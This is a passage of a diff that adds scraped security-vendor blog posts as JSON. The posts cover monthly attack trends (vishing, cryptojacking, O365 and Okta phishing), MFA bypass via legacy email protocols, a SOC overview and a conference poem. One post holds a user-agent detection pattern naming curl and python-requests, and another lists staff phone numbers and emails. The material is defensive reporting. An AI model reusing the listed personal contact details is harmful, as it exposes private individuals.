In a month where we saw a wide variety of initial attack vectors, here\u2019s what stood out: Voice phishing (vishing) to convince end users to install remote access software Cybercriminals continuing to target cryptocurrency A phishing incident highlighting how social engineering remains so effective for attackers Read on to learn more and see our tips for what to do about all of the above. Voice phishing to deploy remote access software TL;DR: Bad actors are deploying legitimate remote access software to gain interactive access to endpoints. In October, around three percent of the incidents we investigated involved bad actors using social engineering to manipulate end users into installing legitimate remote access software, hoping to gain an entry point. By \u201clegitimate,\u201d we mean software that isn\u2019t inherently malicious but has functionality that bad actors can deploy for malicious purposes. Though not yet an alarming presence, we didn\u2019t see any incidents of this type in September, so we\u2019re keeping an eye out for a potential trend. October\u2019s incidents featured several interesting details. They each involved a Windows endpoint, which had the Remote Desktop application built-in. And rather than trying to enable or re-configure the built-in app on the Windows endpoint, the bad actors tried to install alternative remote access software, likely to bypass any security controls implemented at the network level. Since the built-in Windows Remote Desktop application is such a well-known potential entry point for attackers, companies often have multiple security controls in place to prevent opening it up to external connections. For example, external outbound connections over port 3389, the port used by Windows Remote Desktop, are often blocked by perimeter network firewalls. Interestingly, both of these incidents also involved vishing (voice phishing), where bad actors posing as tech support spoke to end users over the phone and instructed them to download and install the remote access software. The remote access software used in these incidents included Screen Connect, AnyDesk and TeamViewer. Based on our investigations, it doesn\u2019t appear the attackers were focused on lateral movement or a larger network compromise, but rather on the individual endpoints they gained access to. This aligns with a conventional Windows Tech Support scam, where scammers target random phone numbers and act as tech support services to try to make end users install a remote access application. Once these attackers gain access to a system, they\u2019ve primarily searched common folder locations for sensitive information or for active banking sessions in the user\u2019s web browsers. Resilience recommendations: Conduct regular security awareness training for your employees, including vishing and verifying calls or download requests supposedly from company IT/tech support. Consider restricting the ability to install non-allowlisted applications in your environment through an endpoint detection and response (EDR) tool or built-in tools like Microsoft Applocker . Assess your asset inventory management to make sure all of your endpoints are accounted for and in compliance with your security standards. Cybercriminals remain interested in cryptocurrency TL;DR: We continued to observe a rise in malicious activity related to cryptocurrency in October using multiple initial infection vectors. 
In October, half of the incident payloads we identified were found to be crypto mining software, up 11 percent from the previous month. This continued increase in malicious crypto mining activity overlaps with the global cryptocurrency market cap setting a new record of 2.7 trillion . In addition to exploiting public-facing vulnerabilities, bad actors also deployed crypto mining software as a web download and even a hijacked npm package. The hijacked npm package resulted from the compromise of a developer npm account for a popular JavaScript library, with this access then used to modify the library. This attack was particularly concerning because it impacted a popular and trusted programming library that was frequently downloaded during routine build and deployment processes for applications. This type of attack is also a prime example of why layered security is so essential for cybersecurity defense. Bad actors continue to find creative ways to deliver payloads \u2014 however, in this incident, the EDR tool deployed on the endpoint quickly alerted us about the resulting mining activity after the initial compromise. The increased monetary value of cryptocurrency is fueling not only this cryptojacking trend ( which we also discussed in September ), but also the trend of targeting crypto wallets . In fact, 25 percent of the malware payloads we identified in October had the ability to locate and extract information about cryptocurrency wallets. This means a grand total of 75 percent of October\u2019s identified payloads had capabilities for generating or stealing cryptocurrency. While crypto-focused attackers have included checks for popular cryptocurrency wallets (like Metamask) in their malware for a long time, they\u2019ve greatly increased their cryptocurrency wallet coverage to include the wide range of options that may be present on an endpoint. If an attacker can collect the private key from a cryptocurrency wallet, they can gain full access to any assets it contains. Resilience recommendations: Implement network layer controls to detect and block network communications to cryptocurrency mining pools. Have computing resource alarms forwarded to your SIEM to alert your team of overtaxed resources deployed for cryptojacking. House cryptocurrency in a hardware wallet disconnected from the internet. Scan and identify public-facing assets using Shodan . Confirm your endpoint detection and response (EDR) coverage across all of your endpoints. Phishing keeps the crown TL;DR: Phishing continues to be the constant in the world of cybersecurity. As long as it remains so accessible and successful for attackers, it\u2019ll stay the number one threat. In October, 42 percent of the incidents we investigated were the result of phishing \u2014 down 19 percent from September, but still the most prevalent attack vector by far in a month when we observed a high variety of infection vectors. Microsoft Office 365 (O365) remains the primary phishing target, as all of the business email compromises (BECs) we saw this month involved the Microsoft email service. In addition to the social engineering activity we observed for deploying remote access software, another phishing incident in October highlighted why this strategy remains so successful for attackers. This incident wasn\u2019t particularly unique, but is a great example of the typical tactics used in a successful phishing attempt, detecting credential usage and the importance of multi-factor authentication (MFA). 
The end user received an email instructing them to click a link to check an urgent voicemail. After clicking the link, the user was redirected to a credential harvesting site configured to appear like a harmless request from Microsoft to re-verify the user\u2019s credentials before granting access to their voicemail. The good news is that when the bad actor tried to use the harvested credentials, Azure AD Identity Protection alerted us about the login attempt, which was unsuccessful thanks to MFA on the account. Resilience recommendations: You know we\u2019re going to say it \u2014 phish-resistant MFA (FIDO/webauthn) for everything and everywhere. Conditional access policies are a great way to help mitigate compromised logins through geo infeasibility. Disable legacy protocols like IMAP and POP3 (these don\u2019t enforce MFA). Consider Azure AD Identity Protection to help identify suspicious mailbox logins. Takeaways Bad actors are using social engineering through phone calls to convince users to install remote access software and configure it as an entry point into their endpoints. This is a prime example of legitimate applications being repurposed for malicious activity, making prevention more difficult. Application allowlisting and security awareness training can be your strongest defense against this particular type of social engineering threat. Cybercriminals also continue to target cryptocurrency as a way to maximize financial gains from their illicit activities. Cryptocurrency\u2019s digital nature, lack of regulation and surging market cap are driving forces behind this trend. Beyond deploying malware for cryptojacking, malware with information stealing functionality are now searching endpoints for a much wider range of cryptocurrency wallets to locate private keys. While many enterprise endpoints may not host cryptocurrency wallets, some companies have made headlines in previous months for adding cryptocurrency exposure to their balance sheets. Companies housing crypto wallets should protect these assets using a hardware wallet disconnected from the internet. And when it comes to cryptojacking, there are two essential things you should do for prevention and detection: first, make sure you don\u2019t have gaps in your EDR deployment coverage. Next, use computing resource alarms to monitor system health and alert your team of overtaxed resources potentially deployed for cryptojacking. Lastly, phishing and BEC remained the biggest threat and most frequent way a bad actor gained access to an environment in October, making up 42 percent of all incidents (with 100 percent of these incidents taking place in O365). Implementing phish-resistant MFA and disabling legacy authentication protocols are key steps to protect O365 accounts. We\u2019ll be back with insights on November\u2019s top attack vectors. In the meantime, have questions about this month\u2019s data or what it means for your org? Drop us a note ." 
+} \ No newline at end of file diff --git a/top-attack-vectors-september-2021.json b/top-attack-vectors-september-2021.json new file mode 100644 index 0000000000000000000000000000000000000000..a09478f4203f16e7855b83e7eaf0d58382590b18 --- /dev/null +++ b/top-attack-vectors-september-2021.json @@ -0,0 +1,6 @@ +{ + "title": "Top Attack Vectors: September 2021", + "url": "https://expel.com/blog/top-attack-vectors-september-2021/", + "date": null, + "contents": "Subscribe \u00d7 EXPEL BLOG Top Attack Vectors: September 2021 Security operations \u00b7 5 MIN READ \u00b7 BRITTON MANAHAN \u00b7 OCT 14, 2021 \u00b7 TAGS: MDR We\u2019re often asked about the biggest threats we see across the incidents we investigate for our customers. Where should security teams focus their efforts and budgets? To answer these questions, we\u2019re sharing monthly reports on the top attack vectors, trends, and resilience recommendations identified by our Security Operations Center (SOC). Our goal is to translate the security events we\u2019re detecting into a security strategy for your org. For this report, our SOC analyzed the incidents we investigated in September 2021 to determine the top attack vectors used by bad actors. Here\u2019s what\u2019s ahead: How bad actors are exploiting public-facing vulnerabilities for crypto mining The PowerShell/DotNet combo bad actors are using for malware The growing Business Email Compromise (BEC) target that can give attackers access to a variety of apps What to do about all of the above Public-facing vulnerabilities and cryptojacking TL;DR: Threat actors are continuing to find and exploit public-facing vulnerabilities, with a focus on deploying cryptocurrency mining software. The exploitation of public-facing vulnerabilities continues to be a top infector vector for threat actors as this category made up 42 percent of the critical incidents we responded to in September. Of these incidents, 80 percent deployed the XMRig cryptocurrency mining software after the initial compromise. This program uses up a vast amount of the compromised system\u2019s resources as it tries to earn cryptocurrency for the threat actors before the software\u2019s detected. This use of compromised computing assets for blockchain mining to earn rewards is known as cryptojacking. Securing potential entry points should be your first focus for preventing cryptojacking and other impactful attacker payloads. In September, we observed the following CVEs for these exploited web applications: CVE-2020-36239 Jira Data Center CVE-2021-26084 Confluence Server Next, system alerts for resource usage can serve a dual purpose for both your operations and security teams. These alerts are normally used by operations teams to automate monitoring system health, but the intense resource demands of cryptocurrency mining software makes it highly likely that cryptojacking will also activate alerts set up to detect when systems are running at their maximum capacity. This monitoring process can be streamlined in the cloud, with built-in solutions like AWS CloudWatch, Azure Monitor and GCP Cloud Monitoring. Resilience recommendations: Consider hiring a penetration tester to gain a better understanding of your external attack surface. Have computing resource alarms forwarded to your SIEM. Deploy an endpoint detection and response (EDR) tool on web servers. Scan and identify public-facing assets using Shodan . Ensure public web applications are patched to their latest version. Deploy a web application firewall (WAF). 
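To make the resource-alarm recommendation above concrete, here is a minimal sketch of creating a CPU alarm for an EC2 instance with boto3. The instance ID, SNS topic ARN, thresholds and alarm name are placeholders; forwarding to your SIEM would hang off whatever is subscribed to that SNS topic.

```python
# Minimal sketch: create a CloudWatch alarm that fires on sustained high CPU,
# the kind of signal crypto mining tends to produce. All identifiers below are
# placeholders -- tune them for your environment, and subscribe your SIEM or
# alerting pipeline to the SNS topic referenced in AlarmActions.
import boto3

cloudwatch = boto3.client("cloudwatch")

cloudwatch.put_metric_alarm(
    AlarmName="sustained-high-cpu-i-0123456789abcdef0",  # placeholder name
    AlarmDescription="CPU pegged for 15 minutes; possible coin miner",
    Namespace="AWS/EC2",
    MetricName="CPUUtilization",
    Dimensions=[{"Name": "InstanceId", "Value": "i-0123456789abcdef0"}],  # placeholder
    Statistic="Average",
    Period=300,               # five-minute datapoints
    EvaluationPeriods=3,      # three consecutive periods = 15 minutes
    Threshold=90.0,
    ComparisonOperator="GreaterThanOrEqualToThreshold",
    AlarmActions=["arn:aws:sns:us-east-1:111122223333:security-alerts"],  # placeholder topic
)
```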
Attacker payloads often use PowerShell and the DotNet framework TL;DR: Malicious payloads deployed by threat actors take advantage of the PowerShell scripting language and DotNet framework built into the Windows operating system (OS) to obfuscate the true nature of the malware and avoid detection. In September, 83 percent of the malicious payloads we identified during incidents used the PowerShell scripting language and/or the DotNet framework. Both of these components are installed by default in modern versions of the Windows OS and provide different pathways for attackers to obfuscate the functionality of their malware. The SolarMarker Malware variant, which made up 33 percent of our identified malicious payloads, is a prime example of malware that uses these two Windows components. We observed a particular SolarMarker variant that was delivered as a Windows installer file. While its activity on the host was blocked before completion, analysis revealed that the malware first executed a series of PowerShell commands to generate an encoded file on the host. This file was then decoded in-memory into a valid DotNet module containing command and control logic that was then loaded and passed control. With the continued popularity of PowerShell and DotNet for attackers, consider the resilience recommendations below to prevent malware from being deployed on your systems through these vectors. Resilience recommendations: Consider implementing PowerShell Constrained Language Mode. Enable PowerShell Script Block Logging. Confirm your endpoint detection and response (EDR) coverage across all of your endpoints. Phishing Business Email Compromise (BEC) is still the top threat, but threat actors are looking beyond your inbox. TL;DR: BEC remained the top threat in September, but attackers are looking to compromise single sign-on (SSO) identity providers, as well. In September, 61 percent of the critical incidents we responded to were BEC \u2014 on par with previous months. Azure AD Identity Protection remained a strong signal for this type of compromise as the source for detecting 56 percent of the BEC incidents we identified. While we\u2019ve covered the basics of BEC in our previous threat reports , we observed two notable trends in September that are worth calling out. The first was the use of a Python-based user agent when threat actors attempted to interact with a mailbox after a successful phishing attempt, seen in 5 percent of the BEC incidents. This stood out to us because threat actors typically spoof their user agents in an attempt to blend in, rather than using the default user agent supplied by their tool of choice, like the Python requests user agent seen in these incidents. This type of scripting language-based user agent presents a detection opportunity, especially if its prevalence continues to rise. Resilience recommendations: You know it\u2019s coming \u2013 multi-factor authentication (MFA) for everything and everywhere. Conditional access policies are a great way to help mitigate geo infeasibility. Disable legacy protocols like IMAP and POP3 (these don\u2019t enforce MFA). Consider Azure AD Identity Protection to help identify suspicious mailbox logins. Bad actors are also going after cloud identity provider access. The second notable BEC trend we observed in September was attackers not only phishing for email access, but also trying to access a user\u2019s cloud SSO provider. 
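(Before we get to that incident, here is a quick illustration of the user-agent detection opportunity mentioned above. This rough sketch flags sign-in events whose user agent looks like a scripting library rather than a real mail client; the event fields are assumptions about how you export your Azure AD or O365 sign-in logs, so adjust them to your own data.)

```python
# Rough sketch of the detection opportunity described above: flag mailbox
# sign-ins whose user agent looks like a scripting library. The event format
# (a list of dicts with 'user', 'ip' and 'user_agent' fields) is an assumption.
import re
from typing import Iterable, List, Dict

SCRIPTED_AGENT_PATTERNS = [
    re.compile(r"python-requests/", re.IGNORECASE),
    re.compile(r"python-urllib", re.IGNORECASE),
    re.compile(r"\bcurl/", re.IGNORECASE),
    re.compile(r"\bgo-http-client\b", re.IGNORECASE),
]


def flag_scripted_sign_ins(events: Iterable[Dict]) -> List[Dict]:
    """Return sign-in events with a scripting-language user agent."""
    flagged = []
    for event in events:
        agent = event.get("user_agent", "")
        if any(pattern.search(agent) for pattern in SCRIPTED_AGENT_PATTERNS):
            flagged.append(event)
    return flagged


if __name__ == "__main__":
    sample = [
        {"user": "a.lee@example.com", "ip": "203.0.113.7", "user_agent": "python-requests/2.26.0"},
        {"user": "a.lee@example.com", "ip": "198.51.100.23", "user_agent": "Outlook-iOS/2.0"},
    ]
    for event in flag_scripted_sign_ins(sample):
        print(f"review sign-in: {event['user']} from {event['ip']} ({event['user_agent']})")
```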
One of the critical incidents we responded to this month had an initial lead of several suspicious logins from the same IP. Further investigation revealed that phishing emails sent to the impacted users contained a link to a credential harvester for the popular SSO identity manager Okta. This wasn\u2019t our first time seeing threat actors attempt to gain access to Okta through phishing. While the threat actors in this particular incident used the harvested Okta credentials to log into Microsoft Office 365 (O365), compromising a user\u2019s SSO credentials opens up a world of possibilities for an attacker to move into any application provisioned to that user. We think attackers were motivated by this opportunity, as all of the incidents we investigated in September involving cloud identity providers targeted Okta. Of note, we\u2019ve also observed threat actors gaining access to Amazon Web Services (AWS) by way of Okta SSO access in previous months. Resilience recommendations: Implement phish resistant MFA (fido/webauthn). Enforce MFA prompts when users connect to sensitive apps through app-level MFA. Customize your Okta sign-in page appearances. If a user lands on a phony Okta sign-in page with no customization, it can help trigger their spidey-sense and let them know that something isn\u2019t right. Takeaways Phishing and BEC remain the hottest threats we\u2019re observing and the most likely way an attacker will gain a foothold into your environment. Threat actors are continuing to target cloud SSO identity providers through phishing emails. While inboxes remain an enticing target, this type of access allows attackers to sign into a variety of applications including cloud providers like AWS, Azure and GCP. Enforcing MFA and disabling legacy protocols should be your first steps to protect against BEC. But when it comes to SSO identity providers, consider customizing your login page to help users visually detect when they\u2019ve opened a fake page like a credential harvester. Then apply additional MFA around any highly sensitive applications and access roles as a second line of defense. In the realm of malware, 80 percent of the public-facing vulnerability exploits we observed in September were used to deploy the XMRig cryptocurrency mining software. This isn\u2019t a coincidence given the recurring cryptocurrency activity we\u2019ve seen this year. Start by following proper endpoint guidance, including EDR and patching, and understand your external attack surface to help prevent these exploits. Next, applications used to alert operations teams of overtaxed resources can also help security teams by indicating resources deployed for cryptojacking. Threat actors are also continuing to deploy malicious payloads that use the PowerShell scripting language and/or the DotNet framework. PowerShell Script Block Logging and constrained language mode can help detect and prevent threat actors using PowerShell. We\u2019ll be back with insights on October\u2019s top attack vectors. In the meantime, have questions about this month\u2019s data or what it means for your org? Drop us a note ." 
+} \ No newline at end of file diff --git a/touring-the-modern-soc-where-are-the-dials-and-blinking.json b/touring-the-modern-soc-where-are-the-dials-and-blinking.json new file mode 100644 index 0000000000000000000000000000000000000000..b8c3e1d3cd584d8daadf56280cf645aeae567eda --- /dev/null +++ b/touring-the-modern-soc-where-are-the-dials-and-blinking.json @@ -0,0 +1,6 @@ +{ + "title": "Touring the modern SOC: where are the dials and blinking ...", + "url": "https://expel.com/blog/touring-the-modern-soc-where-are-the-dials-and-blinking-lights/", + "date": "Dec 5, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Touring the modern SOC: where are the dials and blinking lights? Expel insider \u00b7 3 MIN READ \u00b7 JONATHAN HENCINSKI \u00b7 DEC 5, 2022 \u00b7 TAGS: Tech tools When you think about taking a tour of a security operations center (SOC), what vision comes to mind? Some may see rows of desks with analysts\u2019 eyes glued to computer screens, racks of servers, and other computing equipment. Perhaps there\u2019s a central hub, with lots of dials and blinking lights indicating security levels of the organization\u2019s various tools and services. They picture themselves walking around, taking in the unfamiliar sights, and leaning in to get a closer look. Maybe they ask a few questions and eventually decide, \u201cYes, this is impressive. I feel secure.\u201d The reality of the modern Expel SOC tour is very different from this, mainly because SOC analysts are more likely to be remote and widely distributed geographically. While this means there\u2019s less chance of an impressive room where analysts are physically next to one another, it doesn\u2019t mean they\u2019re any less effective. It simply means that our SOC tour takes a different form. At Expel, the tour starts with a discussion about mission . A key ingredient to high-performing teams is a clear purpose, and ours is to protect our customers and help them improve. This centers around problem solving and serving as a strategic partner. We\u2019re not just helping customers deal with incidents, we\u2019re making recommendations on how to better prepare for future threats, how to improve processes and workflows, and where to make time and resource investments to boost overall security operations. Notice there are no mentions of trying to impress anybody with blinking lights. That\u2019s intentional. Next, we talk about culture and guiding principles \u2014 key ingredients for any SOC. We think about culture as the behaviors and beliefs that exist when management isn\u2019t in the room. Culture isn\u2019t platitudes or memes on a PPT slide; culture is about behavior and intent. The key ingredients of our SOC culture are: We lead with technology Before we solve a problem, we own the problem We\u2019re a learning organization \u201cI don\u2019t know\u201d is always an acceptable answer Once we set a clear mission and mindset, we look at how our team is organized to meet the customer\u2019s goals. Our 24\u00d77 SOC is made up of defenders with varying levels of experience, and less experienced analysts are backed by seasoned responders. If we have a runaway alert (it happens), our team of detection and response (D&R) engineers are ready to respond. And of course, our friendly bots, Josie\u2122 and Ruxie\u2122, are there to support us. Josie detects and classifies alerts and enables us to make decisions about customers\u2019 security signals, while Ruxie gathers critical information about threats so analysts don\u2019t have to. 
The SOC tour then shifts to operations management and how we at Expel do this for a living. We must have intimate knowledge of what our customers\u2019 systems look like to know when an issue needs attention. With solid operations management in place, we can constantly learn from our analysts and operations for the decision moment. We watch patterns and make changes and adjustments to reduce manual effort. This allows us to hand off repetitive tasks to our bots so automation can unlock fast and accurate insights to inform decision-making. This ongoing optimization is one of the things that sets Expel apart. Next, our SOC tour focuses on how we think about investigations (which are really just narratives). When we identify an incident, we investigate to determine what happened, when it occurred, how it got there, and what we need to do about it. Investigations have all the elements of a great story, and we get to write the ending. Next, we talk about quality control in the SOC. We emphasize a few key points: we don\u2019t trade quality for efficiency; we can measure quality in a SOC; and quality control checks run daily, based on a set of manufacturing ISOs, to spot failures so we can drive improvements. What about results? We typically go from alert-to-fix in under 30 minutes, and we\u2019re proud of that number. The result is driven by a high degree of automation and retention of SOC analysts. Some interesting statistics we recently gathered from our SOC team: alert-to-fix time for critical incidents was 28 minutes; 77% of alerts sent to the SOC were backed by automation; auto-remediation actions were completed in seven minutes; and the average tenure of SOC analysts is ~20 months. Before the tour ends, we share insights. The security incidents we detect become insights for every customer. And we don\u2019t stop there; we curate these findings every three months for our Quarterly Threat Report, which surfaces the most significant data we\u2019re seeing in our threat detection and response efforts. It buckets the data into trends that can affect your cybersecurity posture, and it offers resilience recommendations to protect your organization. (Have a free look at our Q3 Quarterly Threat Report here.) We then spend some time looking at the Expel Workbench\u2122, the platform where our SOC analysts work side-by-side with customers on investigations and remediation. This is where all that automation, SOC experience, operations management work, incident insight, and more comes together to detect, understand, and fix issues fast. Take a peek at the Expel Workbench here. Finally, we stop by the actual, virtual SOC. Most of our analysts are remote, but as we noted earlier, a SOC tour is about so much more than seeing a room with monitors. We believe a great SOC tour highlights the people, culture, and mindset behind the technology and processes that help keep our customers\u2019 environments secure. We introduce you to the folks behind the curtain so you can see for yourself we\u2019re a dedicated team \u2014 not just a bunch of blinking lights."
+} \ No newline at end of file diff --git a/twas-the-night-before-rsac-expel.json b/twas-the-night-before-rsac-expel.json new file mode 100644 index 0000000000000000000000000000000000000000..3383e85de3fbb387fe69dcb016d1a8000b0b898f --- /dev/null +++ b/twas-the-night-before-rsac-expel.json @@ -0,0 +1,6 @@ +{ + "title": "'Twas the Night Before RSAC - Expel", + "url": "https://expel.com/blog/twas-night-rsac/", + "date": null, + "contents": "Subscribe \u00d7 EXPEL BLOG \u2018Twas the Night Before RSAC Expel insider \u00b7 3 MIN READ \u00b7 MICHAEL J GRAVEN \u00b7 APR 15, 2018 \u2018Twas the night before #RSAC , when all thro\u2019 San Fran, No attacker was stirring, not even Shodan. The booths were all built, the swag was all there, In hopes that the hordes would actually care. The bankers were nestled all smug in their beds, While visions of IPOs danced in their heads. And Mon with her keynote and I with my lanyard, I\u2019d charged up my phone, and was here to get hammered; When out south of Market arose such a clatter, I whipped out my phone to see what\u2019s the matter. The threatcon was still a calm level two, Not Bears , or Kittens or Pandas . Then who? Dozens of vendor pleas, all trite and lame, They promised the moon, but used my wrong name. \u201cPlease come to our booth! Get a shirt! Buy our things!! Both Gartner and Forrester think we\u2019re the kings. Again. Delete. I banished their scrawl, Dashing away from the exhib-it hall. Then t\u2019ward a party I flew like a moose, Tore past registration and downed a Grey Goose. When what did I spy in a sea of white men, But tech that\u2019s \u201c advanced ,\u201d has \u201c ML ,\u201d is \u201c next-gen !\u201d A sole data scientist, so wiry and sparse, I knew in a moment it must be a farce. And then there were some, like bears eyeing honey, Who saw all the CISOs and wanted their money; So up to the guests by the bar they all flew, With bags full of products and pitches, none true; I\u2019d finished my drink and was turning around, When I froze, \u2018cuz I had been run to ground; Badge scanner in hand, logo bag on his back, He looked like a wombat about to attack. His widget was \u201cscalable,\u201d \u201cunique\u201d and \u201crobust,\u201d Just buy it and go, there\u2019s no need to adjust. His droll little mouth was drawn up like a bow, And clearly he thought that he\u2019d earn lots of dough. He pulled out his phone and went straight to work, \u201cSo when can we meet?\u201d it drove me berserk. But before I could blink or hide my badge code, He looked past my ear, and beyond me he strode; He spied someone else with more budget than me, And I realized that elsewhere is where I could be. I love what I do but I hate being prey, I had to stop pissing my budget away. I needed a break from the endless alerts, To fix what is wrong so it wouldn\u2019t get worse; Could I focus my time and my team on the things, That would bring some real value? Make customers sing? I don\u2019t want to live in a world that\u2019s so dark, Where truth and reality both jumped the shark. It\u2019s working on what is important to you, That keeps you from bidding security adieu. I decided to seek out the folks I could trust, To cover my backside while I readjust. The tools that you buy and the hashes you know Don\u2019t determine your happiness: win, place or show. 
So check out the talks in the con-fer-ence halls, And even some parties and cryptonerd balls; Then find, if you can, your security tribe, The people with whom you share the same vibe; It\u2019s there you will find your burden made light, Propelling you, arming you, into the fight. So with that I say, be you vendor or geek, Happy RSAC to all and to all a good week. Expel doesn\u2019t have a booth. We banned finger guns. We\u2019re at the conference, and if you\u2019d like to meet with us and talk about the way things could be \u2013 which our doggerel verse here hints at, naturally \u2013 head to http://info.expel.io/rsa2018 and grab a spot on our calendar. If you want to talk about Expel, great \u2026 if you want to abuse us about our terrible poetry, that\u2019s cool, too\u2026 and if you just want some Tylenol, Gatorade and a bagel sandwich, hallelujah and we\u2019ll see you there. We\u2019ve been coming to this thing since it was still alternating between San Jose and San Francisco. And while the conference has changed a lot in the last fifteen years (in many ways lamentable), it\u2019s still one of the best opportunities to get together with old friends, have a little fun and talk about how things could be. Expel makes space for you to do what you love. And one of the things we love is catching up with old friends and talking some shop. Hit us up. Michael Graven, +1 (612) 568-5772, michael.graven@expel.io Justin Bajko, +1 (703) 839-5240 , justin.bajko@expel.io Matt Peters, +1 (571) 215-0214, matt.peters@expel.io Peter Silberman, +1 (301) 943-0893, peter.silberman@expel.io" +} \ No newline at end of file diff --git a/two-factor-authentication-doesn-t-fully-secure-cloud-email.json b/two-factor-authentication-doesn-t-fully-secure-cloud-email.json new file mode 100644 index 0000000000000000000000000000000000000000..33e939c8851feebff695a8597f0ef76f36cb419e --- /dev/null +++ b/two-factor-authentication-doesn-t-fully-secure-cloud-email.json @@ -0,0 +1,6 @@ +{ + "title": "Two-Factor Authentication Doesn't Fully Secure Cloud Email", + "url": "https://expel.com/blog/mfa-not-silver-bullet-to-secure-cloud-email/", + "date": "Oct 2, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG MFA is not a silver bullet to secure your cloud email Security operations \u00b7 5 MIN READ \u00b7 ANDREW PRITCHETT AND ANTHONY RANDAZZO \u00b7 OCT 2, 2019 \u00b7 TAGS: Get technical / How to / SOC / Vulnerability Remember the good ol\u2019 days when you used to run your own email servers? Well, maybe they weren\u2019t good days (I\u2019m looking at you, Exchange) \u2026 More and more orgs are transitioning from using traditional on-premise email solutions to cloud-based solutions like Microsoft\u2019s Office 365 and Google\u2019s G Suite. (Fun fact: Microsoft Office 365 had 155 million business users as of last year.) And it\u2019s easy to see why: you no longer have to support all of the required infrastructure or employ a team of individuals to service complicated Exchange deployments. The data is now hosted by a third party who is responsible for encrypting the data at rest, system availability, global delivery and developing and maintaining state of the art security protocols and services. While cloud-based email comes with some security benefits like hosted unified audit logging and modern authentication protocols \u2014 they\u2019re still pretty new and heavily targeted by attackers. 
Cloud-based email systems are an easy way for the bad guys (or gals) to gain initial access into new environments or conduct other criminal activities. You\u2019ve probably heard that if you just enable a multi-factor authentication (MFA) solution, then everything will be sunshine and rainbows. And while MFA is a good step toward securing cloud-based email systems, it\u2019s not a silver bullet. The reality is that MFA can be defeated by an attacker given the right resources and persistence. MFA should only be considered as one of the several security measures an organization should employ rather than the end-all-be-all. Regardless of whether you have MFA enabled or not, it is important to layer your security controls to strengthen your overall security posture. Even if your organization doesn\u2019t have the means to enable MFA, we highly recommend reading further to understand some additional risks to your cloud email environment and ways to reduce that risk. Disable legacy email protocols There are a bunch of email protocols and services in use today: Exchange Web Services (EWS), Messaging Application Programming Interface (MAPI), Exchange ActiveSync (EAS) \u2026 the list goes on . While most of these common email services and applications support MFA, some of the legacy email protocols don\u2019t. For example, the IMAP and POP email protocols are the two you should disable immediately. These protocols don\u2019t support MFA by default and will fully circumvent MFA with single-factor authentication. That means if an attacker phished the credentials of one of your users, then he or she can easily access that user\u2019s entire inbox if authenticating via an IMAP or POP client (and trust us, this will probably be the first thing they try). Another big concern with IMAP and POP are that they expose too much data to the client application. Different clients have different sync settings by default and this determines how much of the mailbox is actually downloaded after a session is created. Attackers can obtain an entire copy of a user\u2019s mailbox in order to search and parse offline for sensitive data. Another shortcoming with these protocols is that there\u2019s usually no logging available to determine exposure once you find an account compromise via IMAP or POP. In many circumstances, your security leaders would consider the entire mailbox exposed. G Suite usually has these protocols disabled by default. However, if somewhere along the road your admins enabled it for any of your users, it\u2019s fairly simple to disable . O365 is another story, though. IMAP and POP are enabled by default and must be manually disabled across the tenant. If your user base is using IMAP or POP clients, particularly mobile clients, this could impact their ability to access email and may require them to authenticate with a new email client that supports MFA. As a helpful reminder, if you have multiple tenants, you will need to apply these actions to all of your tenants. If you determine that it\u2019s catastrophic to end-user experience to get rid of these protocols on your tenant, then consider using global and conditional access policies to prevent employees from using these protocols under certain circumstances. (More on conditional access in a bit.) Disable basic authentication for all email protocols Is your org\u2019s IAM team getting woken up in the wee hours of the night thanks to a ton of Azure Active Directory, G Suite or cloud IAM (Okta/Duo) account lockouts from unauthorized access attempts? 
Here\u2019s the primary culprit. (You\u2019re welcome \u2014 and cheers to now getting a full night\u2019s sleep.) O365 currently has two implementations of authentication: basic authentication and modern authentication (Microsoft\u2019s OAuth2). Because basic authentication is enabled by default, this allows older email clients that do not support modern authentication to bypass MFA as well. The protocols that allow for basic authentication in O365 are ActiveSync, Autodiscover, EWS, IMAP4, POP3, and authenticated SMTP. Now, even if you\u2019ve disabled the IMAP and POP protocol as described in the previous section, the attacker can still attempt to authenticate (via credential stuffing, password spraying, or brute force), which in turn will create an abundance of account lockouts! Microsoft has released some good news though. In October 2020, they will no longer support basic authentication in O365, but in the meantime, you can disable basic authentication yourself. Remember that this could have a major impact your end-user experience, and may require using a different email client. On October 1, 2019, Microsoft released conditional access policies in audit-only mode , which can help measure this impact to users. If you\u2019re interested in the current use of IMAP/POP and other basic authentication sessions in O365, we\u2019ve found that the user-agent string CBAInPROD is a pretty good indication of this activity. Check your Azure AD logs for signs of this if you\u2019re uncertain of your current Exchange configurations. It can be found in the ExtendedProperties of UserLoggedIn operations logs. G Suite also provides support for less secure apps (email clients). This too is disabled by default, but if you find it is enabled for users in your G Suite account, you can disallow sign-in from these apps. Enable conditional access policies Conditional Access enables administrators to apply policies (or multiple policies) to control who and what has access to apps in your environment. Conditional Access policies are enforced after the first-factor authentication has been completed but before the user is granted access to the environment. Therefore Conditional Access can evaluate multiple \u201csignals\u201d against your policies to determine success against certain pass/fail conditions. These \u201csignals\u201d include: \u2713 user and/or group membership \u2713 IP location information or ranges \u2713 users device type, state or use patterns \u2713 attempted access to applications \u2713 real-time and calculated risk detection as well as other features unique to each service provider If your org only services customers in one region of the U.S. and all of your employees reside and operate within the U.S., do you need to allow authentications from China, Russia and the Netherlands? Conditional access policies in O365 are another security measure which is relatively easy to enable and go a long way in supporting the effectiveness of MFA. Policies can be configured within an administrative session on the \u201cAzure Conditional Access\u201d tab. For G Suite, conditional access policies are most often configured via a third-party SSO agent or MFA client such as Okta and DUO respectively. Much like enabling MFA, whenever you make policy changes to authentication protocols, consider any adverse reactions to critical production systems and processes. 
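One way to size up that impact before you change anything is to measure how much legacy authentication is actually happening. As a rough sketch, assuming you have exported UserLoggedIn records from the unified audit log as JSON lines (the file name and record layout here are assumptions), you could tally sign-ins whose extended properties mention the CBAInPROD indicator discussed above:

```python
# Illustrative sketch: tally legacy (basic) authentication sign-ins from an
# export of UserLoggedIn records. Assumes one JSON record per line, each with
# 'Operation', 'UserId' and 'ExtendedProperties' (a list of Name/Value pairs);
# verify the shape of your own export before relying on this.
import json
from collections import Counter


def count_legacy_auth_users(path: str) -> Counter:
    """Count UserLoggedIn events per user whose properties contain CBAInPROD."""
    counts = Counter()
    with open(path, "r", encoding="utf-8") as handle:
        for line in handle:
            record = json.loads(line)
            if record.get("Operation") != "UserLoggedIn":
                continue
            values = [p.get("Value", "") for p in record.get("ExtendedProperties", [])]
            if any("CBAInPROD" in value for value in values):
                counts[record.get("UserId", "unknown")] += 1
    return counts


if __name__ == "__main__":
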